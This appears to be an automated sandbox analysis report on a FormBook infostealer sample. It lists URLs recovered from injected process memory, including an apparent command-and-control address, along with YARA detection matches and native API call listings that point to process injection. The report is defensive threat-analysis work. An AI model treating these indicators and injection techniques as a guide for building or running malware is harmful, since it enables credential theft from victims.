Source: netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://help.hover.com/home?source=parked
Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033zg
Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netsh.exe, 00000004.00000003.2195098353.000000000806E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://twitter.com/hover
Source: netsh.exe, 00000004.00000002.4124592339.000000000542C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.000000000483C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC
Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/?source=parked
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/about?source=parked
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/domains/results
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/email?source=parked
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/privacy?source=parked
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/renew?source=parked
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/tools?source=parked
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/tos?source=parked
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/transfer_in?source=parked
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/hover_domains
Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.nic.ru/
Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.nic.ru/catalog/domains/
Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.nic.ru/catalog/hosting/
Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.nic.ru/catalog/hosting/dedicated/
Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.nic.ru/catalog/hosting/shared/
Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.nic.ru/catalog/hosting/vds-vps/
Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.nic.ru/catalog/ssl/
Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.nic.ru/help/oshibka-404_8500.html
Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://yastatic.net/pcode/adfox/loader.js
Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.yZcecBUXN7.exe.5140000.3.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.yZcecBUXN7.exe.2a7f368.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 0.2.yZcecBUXN7.exe.2a81ba8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0042AED3 NtClose, 1_2_0042AED3
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142B60 NtClose,LdrInitializeThunk, 1_2_01142B60
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142DF0 NtQuerySystemInformation,LdrInitializeThunk, 1_2_01142DF0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142C70 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_01142C70
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011435C0 NtCreateMutant,LdrInitializeThunk, 1_2_011435C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01144340 NtSetContextThread, 1_2_01144340
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01144650 NtSuspendThread, 1_2_01144650
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142B80 NtQueryInformationFile, 1_2_01142B80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142BA0 NtEnumerateValueKey, 1_2_01142BA0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142BF0 NtAllocateVirtualMemory, 1_2_01142BF0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142BE0 NtQueryValueKey, 1_2_01142BE0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142AB0 NtWaitForSingleObject, 1_2_01142AB0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142AD0 NtReadFile, 1_2_01142AD0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142AF0 NtWriteFile, 1_2_01142AF0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142D10 NtMapViewOfSection, 1_2_01142D10
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142D00 NtSetInformationFile, 1_2_01142D00
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142D30 NtUnmapViewOfSection, 1_2_01142D30
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142DB0 NtEnumerateKey, 1_2_01142DB0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142DD0 NtDelayExecution, 1_2_01142DD0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142C00 NtQueryInformationProcess, 1_2_01142C00
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142C60 NtCreateKey, 1_2_01142C60
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142CA0 NtQueryInformationToken, 1_2_01142CA0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142CC0 NtQueryVirtualMemory, 1_2_01142CC0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142CF0 NtOpenProcess, 1_2_01142CF0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142F30 NtCreateSection, 1_2_01142F30
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142F60 NtCreateProcessEx, 1_2_01142F60
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142F90 NtProtectVirtualMemory, 1_2_01142F90
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142FB0 NtResumeThread, 1_2_01142FB0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142FA0 NtQuerySection, 1_2_01142FA0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142FE0 NtCreateFile, 1_2_01142FE0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142E30 NtWriteVirtualMemory, 1_2_01142E30
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142E80 NtReadVirtualMemory, 1_2_01142E80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142EA0 NtAdjustPrivilegesToken, 1_2_01142EA0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01142EE0 NtQueueApcThread, 1_2_01142EE0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01143010 NtOpenDirectoryObject, 1_2_01143010
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01143090 NtSetValueKey, 1_2_01143090
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011439B0 NtGetContextThread, 1_2_011439B0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01143D10 NtOpenProcessToken, 1_2_01143D10
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01143D70 NtOpenThread, 1_2_01143D70
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B4340 NtSetContextThread,LdrInitializeThunk, 4_2_037B4340
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B4650 NtSuspendThread,LdrInitializeThunk, 4_2_037B4650
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2B60 NtClose,LdrInitializeThunk, 4_2_037B2B60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2AF0 NtWriteFile,LdrInitializeThunk, 4_2_037B2AF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2AD0 NtReadFile,LdrInitializeThunk, 4_2_037B2AD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2F30 NtCreateSection,LdrInitializeThunk, 4_2_037B2F30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2FE0 NtCreateFile,LdrInitializeThunk, 4_2_037B2FE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2FB0 NtResumeThread,LdrInitializeThunk, 4_2_037B2FB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2EE0 NtQueueApcThread,LdrInitializeThunk, 4_2_037B2EE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2D30 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_037B2D30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2D10 NtMapViewOfSection,LdrInitializeThunk, 4_2_037B2D10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_037B2DF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2DD0 NtDelayExecution,LdrInitializeThunk, 4_2_037B2DD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_037B2C70
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2C60 NtCreateKey,LdrInitializeThunk, 4_2_037B2C60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2CA0 NtQueryInformationToken,LdrInitializeThunk, 4_2_037B2CA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B35C0 NtCreateMutant,LdrInitializeThunk, 4_2_037B35C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B39B0 NtGetContextThread,LdrInitializeThunk, 4_2_037B39B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2BF0 NtAllocateVirtualMemory, 4_2_037B2BF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2BE0 NtQueryValueKey, 4_2_037B2BE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2BA0 NtEnumerateValueKey, 4_2_037B2BA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2B80 NtQueryInformationFile, 4_2_037B2B80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2AB0 NtWaitForSingleObject, 4_2_037B2AB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2F60 NtCreateProcessEx, 4_2_037B2F60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2FA0 NtQuerySection, 4_2_037B2FA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2F90 NtProtectVirtualMemory, 4_2_037B2F90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2E30 NtWriteVirtualMemory, 4_2_037B2E30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2EA0 NtAdjustPrivilegesToken, 4_2_037B2EA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2E80 NtReadVirtualMemory, 4_2_037B2E80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2D00 NtSetInformationFile, 4_2_037B2D00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2DB0 NtEnumerateKey, 4_2_037B2DB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2C00 NtQueryInformationProcess, 4_2_037B2C00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2CF0 NtOpenProcess, 4_2_037B2CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B2CC0 NtQueryVirtualMemory, 4_2_037B2CC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B3010 NtOpenDirectoryObject, 4_2_037B3010
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B3090 NtSetValueKey, 4_2_037B3090
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B3D70 NtOpenThread, 4_2_037B3D70
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_037B3D10 NtOpenProcessToken, 4_2_037B3D10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C27600 NtCreateFile, 4_2_00C27600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C27760 NtReadFile, 4_2_00C27760
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C278F0 NtClose, 4_2_00C278F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4_2_00C27850 NtDeleteFile, 4_2_00C27850
Detected potential crypto function
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 0_2_00CC30D0 0_2_00CC30D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0040F973 1_2_0040F973
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_004029D0 1_2_004029D0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00401210 1_2_00401210
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0042D353 1_2_0042D353
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00416313 1_2_00416313
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00403380 1_2_00403380
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0040FB93 1_2_0040FB93
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0040DC10 1_2_0040DC10
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0040DC13 1_2_0040DC13
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0040271D 1_2_0040271D
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_00402720 1_2_00402720
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011AA118 1_2_011AA118
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01100100 1_2_01100100
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01198158 1_2_01198158
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D01AA 1_2_011D01AA
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C41A2 1_2_011C41A2
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C81CC 1_2_011C81CC
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011A2000 1_2_011A2000
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CA352 1_2_011CA352
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111E3F0 1_2_0111E3F0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D03E6 1_2_011D03E6
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0274 1_2_011B0274
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011902C0 1_2_011902C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110535 1_2_01110535
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011D0591 1_2_011D0591
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B4420 1_2_011B4420
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C2446 1_2_011C2446
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011BE4F6 1_2_011BE4F6
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01134750 1_2_01134750
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110770 1_2_01110770
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110C7C0 1_2_0110C7C0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0112C6E0 1_2_0112C6E0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01126962 1_2_01126962
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011129A0 1_2_011129A0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011DA9A6 1_2_011DA9A6
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111A840 1_2_0111A840
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01112840 1_2_01112840
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_010F68B8 1_2_010F68B8
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0113E8F0 1_2_0113E8F0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011CAB40 1_2_011CAB40
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011C6BD7 1_2_011C6BD7
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110EA80 1_2_0110EA80
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011ACD1F 1_2_011ACD1F
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0111AD00 1_2_0111AD00
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01128DBF 1_2_01128DBF
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_0110ADE0 1_2_0110ADE0
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01110C00 1_2_01110C00
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B0CB5 1_2_011B0CB5
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01100CF2 1_2_01100CF2
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01130F30 1_2_01130F30
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_011B2F30 1_2_011B2F30
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01152F28 1_2_01152F28
Source: C:\Users\user\Desktop\yZcecBUXN7.exe Code function: 1_2_01184F40 1_2_01184F40
